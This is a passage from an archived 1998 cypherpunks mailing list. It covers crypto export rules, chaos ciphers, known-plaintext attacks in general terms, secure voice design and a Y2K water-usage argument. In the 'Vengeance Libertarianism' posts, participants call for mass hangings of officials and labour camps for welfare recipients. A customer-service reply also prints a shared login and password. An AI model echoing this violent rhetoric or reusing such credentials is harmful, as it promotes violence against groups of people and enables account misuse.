internet phone. I know it has been done. I just won't be happy 'til it's
in 50 million homes.

> * We'd never take encryption hardware through the same path as modems,
> would we? First used between companies, then used for remote access,
> eventually you can't buy a bloody machine without one. Getting
> cheaper, faster, closer to the motherboard, taken for granted by 
> applications.  Ever seen a 300 baud, 40 lb modem, cost probably $3000
> in 1970 dollars?  
>
Yes, I have. Fortunately encryption HW will not have to go through that
sort of process. The frontier has been tamed, there are freeways
everywhere - all you have to do is pick a lot and build. IOW - that 300
baud modem if done from scratch now would cost nowhere near $3000/unit.

> The final level of deployment is when garage-door-openers, car
> remotes, and childrens' toys (e.g., radio controlled cars) use 
> encryption chips... or chips with encryption, anyway.
>
The time is ripe.

> The outside encrypting unit should also perform NAT, otherwise
> the PC (doing the tunnelling) can broadcast traffic ('trap and trace' 
> in the pots world) info.
>
Clueless again! What is 'NAT'?

> Email is so low-bandwidth that software suffices.
>
Absolutely. The issue there is more one of trustworthy HW and SW. Back
to WINTEL/MICROSNORT. Again, !barf!.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 5 Dec 1998 01:58:45 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Send email list - go to jail for life in China [/.]
Message-ID: <199812041729.LAA24557@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://news.bbc.co.uk/hi/english/world/asia-pacific/newsid_224000/224907.stm

>    Cyber dissident awaits trial in China

>    By China Analyst James Miles 
>    
>    A man is awaiting trial in Shanghai prison charged with using the
>    Internet to try to subvert the government.
>    
>    Patrick Lin, 30, was arrested in March for sending 30,000 Chinese
>    e-mail addresses to an Internet magazine run by Chinese dissidents
>    abroad.

[text deleted]


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 5 Dec 1998 02:02:08 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Ethical programming guild? [/.]
Message-ID: <199812041731.LAA24617@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://slashdot.org/features/98/12/04/1158251.shtml

>    The following was written by Slashdot Reader James Moyer .
>    
>    In proposing this idea, I think that it would a little bit of
>    background would be appropriate. I am a student at Ohio State, and I
>    have a strong interest in civil liberties and privacy issues. In fact,
>    I am now in the process of organizing an on-campus student
>    organization to criticize Ohio State's overuse of the social security
>    number, biometric identification and other related issues to privacy
>    directly concerning the university.
>    
>    Here on Slashdot I use the nickname JimBobJoe posting from email
>    address vampire@innocent.com.
>    
>    I also consider myself a Libertarian, and from many of the postings on
>    Slashdot, it appears that there are quite a lot of Libertarians out
>    there too. There is no coincidence, in my mind, that some of the most
>    stringent privacy laws in the nation hail from a highly technical,
>    Libertarian state, being Washington state. In the same vein, it is
>    rather amusing to see countries such as Malaysia attempt to draw
>    computer professions into their country, where the severity of their
>    laws turn many away.

[text deleted]


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 5 Dec 1998 04:23:49 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Streams, Voice, and Sensitive Dependence
Message-ID: <36683D66.CCBCB35F@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



"Lee Davis"<lee.davis@thomasmore.edu> skribis:
> In any case, there has been a lot of recent work in dynamic systems (Chaos),
> especially in the fast computations of Julia Sets.  Has anyone seen a paper on
> exploiting the sensitive dependance in these systems for pseudorandom number
> generation?

A number of attempts have been made to apply chaos to cryptosystems.  The two
that I've broken suffered from the same fault: although it's difficult to find
the precise starting point (key) due to sensitive dependence, chaotic systems
are by definition non-random, and have preferred orbits.  If the cryptanalyst
finds an orbit that's close to the one used by the actual key, the stream is
mostly the same; this is good enough to hone the attack for the next pass.

I'm not saying chaos has no applications in cryptography; only that the
applications are not obvious.
-- 
	Jim Gillogly
	Trewesday, 14 Foreyule S.R. 1998, 19:37
	12.19.5.13.7, 6 Manik 20 Ceh, Sixth Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Sat, 5 Dec 1998 03:15:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: y2k/gary north delusions
In-Reply-To: <199811290304.TAA06582@netcom13.netcom.com>
Message-ID: <v04011706b2889eb2b6a8@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



Looks like this one didn't make it out the first time around.
It's a little late. Sorry.

At 10:04 PM -0500 11/28/98, Vladimir Z. Nuri wrote:
>anyway I hate to say that I think he is really losing his
>mind lately.. no there are going to be some serious y2k problems,
>but imho the bottom approaches "garbage".. any talk of riots,
>mobs, martial law, stockpiling weaponry, roving bandits
>etc. seems to me to be really way off base to say the least.
>now people have been talking about this, but I've never seen
>gary north go quite that crazy.

	Not just crazy, flat out _wrong_ in at least one case:

>     Let's start with the basics: water.  An urban adult
>uses 75 to 100 gallons of water a day.  This doesn't count

	Like hell. Your average adult drinks at MOST 1 gallon a day,
including coffees sodas etc. It is _real_ difficult to drink over 1 gallon,
and you can seriously fuck your system up (mineral balances) if you drink
too much.

	I drink a LOT of (non-alcohol) fluid (as opposed to drinking
solids) a day, and I usually top out at 3 quarts, unless I am doing a long
distance ride.

	Let's round it up and call it one gallon for drinking.

	Showers: If you need more than 10-15 gallons, you are taking too long.

	Cooking: another gallon.

	Washing hands & dental hygene: 0ne more.

	Flushing toilets: 2-5 gallons per flush. Drinking one gallon of
water a day gets you flushing a _lot_, about 10 flushes a day (we are going
outer limits
on this one) that is 20 to 50 gallons a day.

	Washing dishes shouldn't take more than 3 for pots & pans, and one
for each persons utensils.

	Total: 40-75 (rounded up).

	That's for comfort. It also doesn't include watering the lawn or
washing the car.

>watering the lawn.  In 2000, how many people will be under
>your roof?  Remember, your children may show up on your
>doorstep, with wives and children.  Families will pull
>together for survival in 2000.  Estimate the number of
>people under your roof in 2000.  Now, how much water will
>you need per day?

	Ok, so let's cut that back to what we _need_. First off, we don't
dump our dish water down the drain, it gets "recycled" to flush the
toilets.

	So does the shower water.

	Then we only flush when we need to (i.e. not for every urination as
when drinking 3/4 a gallon a day (we are cutting back a little)  it's
mostly straight water anyway). So that eliminates almost all of the 20-50
gallons.

	Then we only shower when necessary, rather than every day, we
should be able to go 2-3 days between showers. No, it's not as pleasent,
but at least it's not unsanitary. So we'll say every other day droping our
daily consumption down to 5-7.5

	We won't touch cooking, and we'll increase the washing hands/other
hygene to 2 gallons to help make up for the lack of showers (actually,
doing this you could strecth to 3 days easily).

	So:
	drinking: 3/4 gallon (note that not all of this has to be "water",
fruit juice, sodas (at least until supplies run out) etc.)
	Showers: 5-7.5
	Cooking: 1 gallon
	Washing hands &etc. 2 gallons.
	Flushing Toilets: Allocate 10 just in case.
	Washing dishs: 4 (we aren't skimping here for hygene reasons).

	Total: 22-25.

	One half to one quarter Mr. Norths claims, and I'd bet my numbers
are still on the high side. This is also a fairly comfortable level
compared to pure survival.

>     What if the municipal water authority shuts down?
>It's goodbye showers.  Goodbye flushing toilets.  Hello sponge

	Only if you're a fucking idiot. You don't need potable water to
shower with, and you sure as hell don't need it to flush a toilet.

>     Let's assume that for the first three months in 2000,
>you will not get paid.  The banks will be down.  You will
>not be able to write a check or use a credit card.  What
>will you do?

	Live off those who planned ahead, stocked up spent thousands of
dollars on Food, Generators, guns & etc. but didn't spend 10 minutes making
sure their bodies were prepared & died of heart attacks trying to pull
start their generators to keep their computers running.

	(I'm mostly joking about the above)

>     What will your neighbors do?

	Run for the suburbs.

>     If it's a year, it could be a decade.

	If it's a decade, we're all fucked.

>     What will you do?  What is your exit strategy?

	Sit tight with several months of food (we have a largish lake
nearby, Lake Michigan, maybe you've heard of it) & asst. supplies and see
how things go. There are way too many variables to actually _plan_ an "exit
strategy", and no where to go.

>     Should you head for the hills?  Wrong question.  What
>solid evidence do you have that you shouldn't?

	Try this: NO WHERE TO GO. THERE ISN'T ENOUGH HILLS, AND EVERY ONE
IS HEADING THERE.

	YOU CAN'T RAISE (large amounts) OF FOOD IN THE HILLS W/OUT TRACTORS
AND SHIT, and you can't do it w/people shooting you to get your tractors,
food, and desiel.

>     Should you stay where you are?  What items will you

	Yes.

>need in your possession in 2000 and 2001 to make your

	Adequate food, warm clothing, & assorted stuff (including a couple
firearms for self protection.

>     Let me give a simple example.  How will you wash
>clothes for everyone?  Let's assume that you have water.
>(Dreamer!)  You can buy a 40-lb. tub of Wind Fresh laundry
>detergent from Sam's Club for $10.  It will do 160 loads.

	Ummm. Gary, how did people wash their clothes before they could buy
soap at the store?

	Why don't you print a recipe for Lye Soap?

	Because it's a lot easier being a blowhard.


>Their clothes will be dirty.  You will be clean.  You will
>not have lost 30 pounds.  You will be the target of envy on
>a scale you can barely imagine today.  You will be
>despised.  Will you be ready for this psychologically?

	Been despised all my life. I'm sure you know what that is like.

>local bank deal with y2k.  The question and answer session
>is especially useful.  It sells for $39.95:

	So over the next 12 months banks will fail, society will collapse,
and TWAWKIWE, and he is trying to get rich off it.

	Things that make you go Huh?
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Davina Heaven <davinah@chemweb.com>
Date: Fri, 4 Dec 1998 21:02:52 +0800
To: "'cypherpunks@toad.com>
Subject: ChemWeb.com
Message-ID: <F96F19AD1B88D1119A07006097BAC2FF010ED567@mhexchange.epress.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Dear Dr Cypherpunks

Thank you for your message to ChemWeb.com.

Please enter your Member Name (user name) and Password exactly as shown
below (please note that our system is case sensitive and will not tolerate
spaces):

Member Name:	cypherpunks
Password:		crossfire

If you have any further queries or comments, please do not hesitate to
contact me again.

Yours sincerely,





Davina Heaven
Customer Services
ChemWeb Inc.
50 New Bond Street
London W1Y 6HA

Tel: +44 (0)171 499 4748
Fax: +44 (0)171 499 4102

http://ChemWeb.com
World Wide Club for the Chemical Community

> -----Original Message-----
> From:	cypherpunks@toad.com [SMTP:cypherpunks@toad.com]
> Sent:	None
> To:	info@chemweb.com
> Subject:	ChemWeb password
> 
> Request for password:
> 
> Full name: cypherpunks cypherpunks
> Current e-mail: cypherpunks@toad.com
> Other e-mails: 
> Member name: cypherpunks
> Comment: 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 5 Dec 1998 05:01:45 +0800
To: cypherpunks@cyberpass.net
Subject: Re: joy of export, h/ware
Message-ID: <36684528.E3AB7D@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



>>> What type of attack was used in the famous test? Known plaintext? It
>>> gets a bit tougher in the real world doesn't it?
>>
>> Not really.  

Michael Motyka <mmotyka@lsil.com> skribis:
> Even if you don't know what you're looking for? Help me out with that
> one.

The question was "in the real world": in this case, as opposed to artificial
challenges, you often (or normally) do have access to known or chosen
plaintext.  This can involve expected headers ("\nSubject: " somewhere near
the beginning of a message has a good chance of giving you a 64-bit block),
standard plaintext (".  The " is a perennial favorite), or known C idioms
("#include <stdio.h>\n") can all be tried.

The EFF hardware is set up to look for various kinds of patterns.  For
example, it can check the high bit on the recovered plaintext, to see
whether the result is ASCII.  This is certainly the easiest way to get
in if you're breaking normal uncompressed messages or source code.  If
it's compressed, you still may be OK -- most compression packages put
magic file identifiers at the beginning, and some have guessable trees
there.

If you're breaking a transaction stream it's likely to be even easier,
with the standard headers, even if you don't go to the trouble of
injecting your own know transaction into the stream.

-- 
	Jim Gillogly
	Trewesday, 14 Foreyule S.R. 1998, 20:22
	12.19.5.13.7, 6 Manik 20 Ceh, Sixth Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lee Davis"<lee.davis@thomasmore.edu>
Date: Sat, 5 Dec 1998 03:32:35 +0800
To: <cypherpunks@Algebra.COM>
Subject: Streams, Voice, and Sensitive Dependence
Message-ID: <9812049127.AA912797826@smtplink.thomasmore.edu>
MIME-Version: 1.0
Content-Type: text/plain



It is my understanding that the PGP algorithm is primarily intended as a block
cypher.  Therefore, wouldn't an Outer Block stream cypher be more effective for
phone conversations?  Both solutions require hardware for a practical (tolerably
noiseless) implementation, so there's nothing to be gained by streaming data
into a block format.

In any case, there has been a lot of recent work in dynamic systems (Chaos),
especially in the fast computations of Julia Sets.  Has anyone seen a paper on
exploiting the sensitive dependance in these systems for pseudorandom number
generation?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 5 Dec 1998 04:29:50 +0800
To: <cypherpunks@Algebra.COM>
Subject: Re: Streams, Voice, and Sensitive Dependence
In-Reply-To: <9812049127.AA912797826@smtplink.thomasmore.edu>
Message-ID: <v04020a3fb28dea616cec@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:53 PM -0500 on 12/4/98, Lee Davis wrote:


> It is my understanding that the PGP algorithm is primarily intended as a
>block
> cypher.

PGP is not a cipher. PGP is an application with a bunch of ciphers in it,
most of the block ones.

PGPfone is not a cipher either, it's an applicatoin with a bunch of ciphers
in it, most of them stream ones...

Cheers,
Robert Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 5 Dec 1998 04:18:32 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Wassenaar Addendum
Message-ID: <199812041953.OAA18883@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Caspar Bowden in the UK says by telephone that a Wassenaar 
spokesman told him today that the WA org will issue next week a 
detailed "template"  which specifies terms of the recent agreement 
to control encryption. 

It will go well beyond what has been heretofore generally agreed to 
by the member states under which there was a good bit of latitude 
for each to determine its own policy. This is an unprecedented united
front by the members, and the paper will be a first for detailed export
controls issued by the Wassenaar org rather than by each nation. 

When ready it will be put on the Wassenaar Web site: 

   http://www.wassenaar.org.

We've made a request to DoC for elaboration of the press release
yesterday which featured David Aarons' general claims, but no 
response yet. The USG may not comment until the WA paper is
issued.

Caspar posted a capsule of his infor on UK Crypto:

From: "Caspar Bowden" <cb@fipr.org>
To: <ukcrypto@maillist.ox.ac.uk>
Subject: News from Wassenaar Secretariat
Date: Fri, 4 Dec 1998 16:23:58 -0000
Message-ID: <000101be1fa2$9da127e0$dc77e4d4@cpsb>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal

Just talked to Dirk Weicke, Senior Adviser to Wassenaar Organisation.
(Tel:+43 1 516360)

No written details will be issued until next week, but gist is:

*) No alteration to question of whether Wassenaar covers intangible exports.
Up to signatory states to interpret and legislate.

*) mass-market software, symmetric key length limited to 56-bits

*) software generally available, but with other restrictive tests on
end-user re-configurability, symmetric key length limited to 64-bits

*) Assymetric key lengths (not sure how relates to above) limited to:

RSA & Digital logarithm: 512 bits
Elliptic curve : 112 bits


--
Caspar Bowden                    http://www.fipr.org
Director, Foundation for Information Policy Research
Tel: +44(0)171 354 2333      Fax: +44(0)171 827 6534

----------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 5 Dec 1998 05:31:23 +0800
To: petro@playboy.com (Petro)
Subject: Re: y2k/gary north delusions
In-Reply-To: <v04011706b2889eb2b6a8@[206.189.103.230]>
Message-ID: <199812042048.OAA15267@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Petro wrote:
> Looks like this one didn't make it out the first time around.
> It's a little late. Sorry.
> 
> At 10:04 PM -0500 11/28/98, Vladimir Z. Nuri wrote:
> >anyway I hate to say that I think he is really losing his
> >mind lately.. no there are going to be some serious y2k problems,
> >but imho the bottom approaches "garbage".. any talk of riots,
> >mobs, martial law, stockpiling weaponry, roving bandits
> >etc. seems to me to be really way off base to say the least.
> >now people have been talking about this, but I've never seen
> >gary north go quite that crazy.
> 
> 	Not just crazy, flat out _wrong_ in at least one case:
> 
> >     Let's start with the basics: water.  An urban adult
> >uses 75 to 100 gallons of water a day.  This doesn't count
> 
> 	Like hell. Your average adult drinks at MOST 1 gallon a day,
> including coffees sodas etc. It is _real_ difficult to drink over 1 gallon,
> and you can seriously fuck your system up (mineral balances) if you drink
> too much.
> 
> 	I drink a LOT of (non-alcohol) fluid (as opposed to drinking
> solids) a day, and I usually top out at 3 quarts, unless I am doing a long
> distance ride.
> 
> 	Let's round it up and call it one gallon for drinking.
> 
> 	Showers: If you need more than 10-15 gallons, you are taking too long.

Come on people. We are talking SURVIVAL here. Can you ski your showers
if you do not have enough water?

The true answer is, if shit hits the fan and there is no water in the
faucet, almost all activity except drinking and washing hands and dishes
can be curtailed.

Even flushing toilets is not necessary as anyone can shit outside.

I am speaking out of personal experiences, living with water outages
while we were in the Russian countryside. It was no big deal, period.


> 	Cooking: another gallon.

It is included.

> 	Washing hands & dental hygene: 0ne more.
> 
> 	Flushing toilets: 2-5 gallons per flush. Drinking one gallon of
> water a day gets you flushing a _lot_, about 10 flushes a day (we are going
> outer limits
> on this one) that is 20 to 50 gallons a day.
> 
> 	Washing dishes shouldn't take more than 3 for pots & pans, and one
> for each persons utensils.

Much less. 

> 	Total: 40-75 (rounded up).

Total: 2-3.

> 	Ok, so let's cut that back to what we _need_. First off, we don't
> dump our dish water down the drain, it gets "recycled" to flush the
> toilets.

get them to shit outside.
 
> >     What if the municipal water authority shuts down?
> >It's goodbye showers.  Goodbye flushing toilets.  Hello sponge
> 
> 	Only if you're a fucking idiot. You don't need potable water to
> shower with, and you sure as hell don't need it to flush a toilet.

Correct.

Gary North is not stupid. he realizes all this, as it is not
rocket science.

Then why he keeps telling all this?

The answer is, to peddle his wares.

I am not suggesting that Y2K is going to be a cakewalk. Quite possibly
not. But Gary North is not worth listening to because he is biased and
has a conflict of interests.

> >     Let's assume that for the first three months in 2000,
> >you will not get paid.  The banks will be down.  You will
> >not be able to write a check or use a credit card.  What
> >will you do?
> 
> 	Live off those who planned ahead, stocked up spent thousands of
> dollars on Food, Generators, guns & etc. but didn't spend 10 minutes making
> sure their bodies were prepared & died of heart attacks trying to pull
> start their generators to keep their computers running.

> 	(I'm mostly joking about the above)

I think that you had a good point... A long time ago I posted a "Skills
vs. guns" article to misc.survivalism. its point was, that in the long
run having good skills and health was more important than stocking up.

> >     Let me give a simple example.  How will you wash
> >clothes for everyone?  Let's assume that you have water.
> >(Dreamer!)  You can buy a 40-lb. tub of Wind Fresh laundry
> >detergent from Sam's Club for $10.  It will do 160 loads.
> 
> 	Ummm. Gary, how did people wash their clothes before they could buy
> soap at the store?
> 
> 	Why don't you print a recipe for Lye Soap?


You can make semi-good "soap" from animal fat and ash.


> 	Because it's a lot easier being a blowhard.
> 
> 
> >Their clothes will be dirty.  You will be clean.  You will
> >not have lost 30 pounds.  You will be the target of envy on
> >a scale you can barely imagine today.  You will be
> >despised.  Will you be ready for this psychologically?
> 
> 	Been despised all my life. I'm sure you know what that is like.

No biggie.

Besides, if you don't want to be despised, just don't be clean.


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Sat, 5 Dec 1998 07:38:51 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Streams, Voice, and Sensitive Dependence
Message-ID: <36686876.1AF5@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> It is my understanding that the PGP algorithm is primarily intended
> as a block cypher.  Therefore, wouldn't an Outer Block stream cypher
> be more effective for phone conversations?  Both solutions require 
> hardware for a practical (tolerably noiseless) implementation, so 
> there's nothing to be gained by streaming data into a block format.
>
Unless you have a really fast ( 1 Mbit / s? ) data connection you're
going to want to do some voice compression. The algorithms I've seen
break the audio into discrete time frames and (de)compress frame by
frame. As a point of reference say about 16 bytes for every 33 msec of
voice. Quality roughly follows data rate, of course. This makes a block
cipher seem not so unreasonable.

Block cipher or stream cipher, either way you're going to have to
introduce a latency of _at_least_ a couple of frames to allow for
resends or deliberate out-of-order frame transmission. This makes the
block cipher look like the better choice.

I think that using HW voice compression and a 33.6 modem you could get a
full duplex secure conversation over POTS with a latency in the 0.1 -
0.3 second range and a direct cost in the vicinity of $100. With a
reasonably quick microP any encryption method could probably be done as
SW.

This is not a particularly difficult device to build. Any fine US
citizens want to build some prototypes? 

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 5 Dec 1998 04:38:54 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Mixmaster client 4 the Mac OS?
Message-ID: <v04020a41b28deecb769b@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mime-Version: 1.0
X-Sender: loki@sirius.infonex.com
Date: Fri, 4 Dec 1998 10:08:01 -0800
To: Robert Hettinga <rah@shipwright.com>, mac-crypto@vmeng.com
From: Lance Cottrell <loki@infonex.com>
Subject: Re: Mixmaster client 4 the Mac OS?
Sender: <mac-crypto@vmeng.com>
Precedence: Bulk

Several people have offered, but none have produced a fully functional version.

	-Lance

At 8:53 PM -0500 12/3/98, Robert Hettinga wrote:
>--- begin forwarded text
>
>
>Date: Fri, 4 Dec 1998 01:42:19 +0100
>From: Anonymous <nobody@replay.com>
>Comments: This message did not originate from the Sender address above.
>	It was remailed automatically by anonymizing remailer software.
>	Please report problems or inappropriate use to the
>	remailer administrator at <abuse@replay.com>.
>Subject: Mixmaster client 4 the Mac OS?
>To: cypherpunks@toad.com
>Sender: owner-cypherpunks@cyberpass.net
>Precedence: first-class
>Reply-To: Anonymous <nobody@replay.com>
>X-Loop: cypherpunks@cyberpass.net
>
>I heard sometime last summer that the mixmaster client was being ported to
>the Mac. Does anyone know the status of this project?
>
>--- end forwarded text
>
>
>-----------------
>Robert A. Hettinga <mailto: rah@philodox.com>
>Philodox Financial Technology Evangelism <http://www.philodox.com/>
>44 Farquhar Street, Boston, MA 02131 USA
>"... however it may deserve respect for its usefulness and antiquity,
>[predicting the end of the world] has not been found agreeable to
>experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

----------------------------------------------------------
Lance Cottrell   loki@infonex.com
PGP 2.6 key available by finger or server.
http://www.infonex.com/~loki/

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Sat, 5 Dec 1998 06:22:40 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: Vengeance Libertarianism
In-Reply-To: <v04011724b28da8949eac@[206.189.103.230]>
Message-ID: <v04011701b28de6441b28@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:00 PM -0500 12/4/98, Tim May wrote:
>At 7:04 AM -0800 12/4/98, Petro wrote:
>
>>	I just disagree with your "millions who need killing". Because some
>>beleives in a polly-annaish world were taking guns away from the "good
>>guys" also keeps them away from the "bad guys" is no reason to kill them.
>>It's a reason to render them impotent until such time as they wake the hell
>>up, and if they don't manage to wake the hell up until some mugger points a
>>chinese manufactured .25 at them in the middle of the night and just
>>fucking pulls the trigger because murder carries the same punishment (or
>>less) than carrying a gun (enemy of the state) then "we" didn't kill them,
>>they killed themselves.
>
>You are free to adopt the beliefs of what I'll call "the forgiveness
>libertarians." Summarized, roughly, as:
>"You've been stealing from me, sending my sons to die in your foreign wars,
>imprisoning my friends for what they smoke or eat...but let's let bygones
>be bygones...stop your stealing ways and we'll forget about what you did in
>the past."

	You are (it seems) slightly misinterpreting what I am trying to say.

	The average individual, Joe Six-pack, doesn't start wars. He
doesn't actually imprison anyone (unless he is a cop), and he doesn't
(usually) vote for the laws that actually imprison people.

	In most cases he doesn't even vote at all. He is pawn, at most a
peice to be sacrificed.

	It's the Kings and Queens that are the problem (and to carry the
analogy further, the hand[s] that move them) that really diserve our
anomosity.

	The politicians, and not even all of them, should be the targest of
"our" ire.
>This is a dominant thread of libertarianism, though it is seldom
>articulated as I have just done. Look at the platform of the Libertarian
>Party and you'll see this "forget the past, look to the future" approach.

	That is because the Libertarians are trying to join the football
game, and to even be in the game, you have to be pleasant.

>I, on the other hand, have drifted into the camp I will dub "the vengeance
>libertarians." Summarized, roughly, as:
>
>"You've stolen my property, you've imprisoned my friends, you've passed
>laws making us all criminals, you've started wars to enrich your
>military-industrial complex friends, and you're corrupt bastards. You can
>forget about some kind of "libertarian amnesty." It's going to be payback
>time, with at least hundreds of thousands of statist judges, politicians,
>cops, soldiers, and other such persons going to the gallows. Payback time.
>Welfare recipients are going to have to pay back all that they have stolen,
>with compounded interest. Out of their pockets, or while in labor camps.
>Payback time."

	Which would be more satisfying to you, to shoot these people
(personally I'm in favor of hangings, the ropes are not only a reusable
resource, but afterwords we put them in glass cases in museums around the
nation/world as permanent reminders of what _will_ happen when the people
get pissed enough), or to watch them starve to death as most of them have
no useful talents outside their ability to sway the population to their
will?
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Sat, 5 Dec 1998 08:27:22 +0800
To: cypherpunks@toad.com
Subject: PGP Disk
Message-ID: <ffb11ca678021ba2520429c8369c44a8@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone had the chance to try out the new McAfee PGP disk?
It seems pretty straightforward, allowing for the creation of 
encrypted "drives" using the CAST algorithm.  Is anyone aware of 
any security flaws with it?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Sat, 5 Dec 1998 07:22:39 +0800
To: ichudov@Algebra.COM (Igor Chudov)
Subject: Re: y2k/gary north delusions
In-Reply-To: <v04011706b2889eb2b6a8@[206.189.103.230]>
Message-ID: <v04011703b28df9c5afbe@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:48 PM -0500 12/4/98, Igor Chudov @ home wrote:
>> 	Not just crazy, flat out _wrong_ in at least one case:
>> >     Let's start with the basics: water.  An urban adult
>> >uses 75 to 100 gallons of water a day.  This doesn't count
>> 	Like hell. Your average adult drinks at MOST 1 gallon a day,
>> including coffees sodas etc. It is _real_ difficult to drink over 1 gallon,
>> and you can seriously fuck your system up (mineral balances) if you drink
>> too much.
>> 	I drink a LOT of (non-alcohol) fluid (as opposed to drinking
>> solids) a day, and I usually top out at 3 quarts, unless I am doing a long
>> distance ride.
>> 	Let's round it up and call it one gallon for drinking.
>> 	Showers: If you need more than 10-15 gallons, you are taking too long.
>Come on people. We are talking SURVIVAL here. Can you ski your showers
>if you do not have enough water?

	In the first block he was talking about _normal_ _day_to_day_ water
usage. I was attacking that point.

>The true answer is, if shit hits the fan and there is no water in the
>faucet, almost all activity except drinking and washing hands and dishes
>can be curtailed.

	Not for long periods of time. General cleanlyness IS VERY important
in survival situations. Clean skin and clothes help prevent infections from
common wounds (like barking your shin against something, or a scratch from
a tree branch &etc.)

>Even flushing toilets is not necessary as anyone can shit outside.

	Not in a crowded enviroment, that being a mid-sized town to a large
city.

>I am speaking out of personal experiences, living with water outages
>while we were in the Russian countryside. It was no big deal, period.

	Countryside.

>> 	Cooking: another gallon.
>It is included.

	Included in what? The pasta? The rice? The beans?

	I am not talking about a camping trip here, I am talking about
living off stored food for one to three months (anything longer (IMO) takes
VERY VERY different preperations.

>Much less.
>> 	Total: 40-75 (rounded up).
>Total: 2-3.

	In a max survival do-or-die situation, yes. For long term health,
no. and besides, that was a number assuming "normal" usage.

>> 	Ok, so let's cut that back to what we _need_. First off, we don't
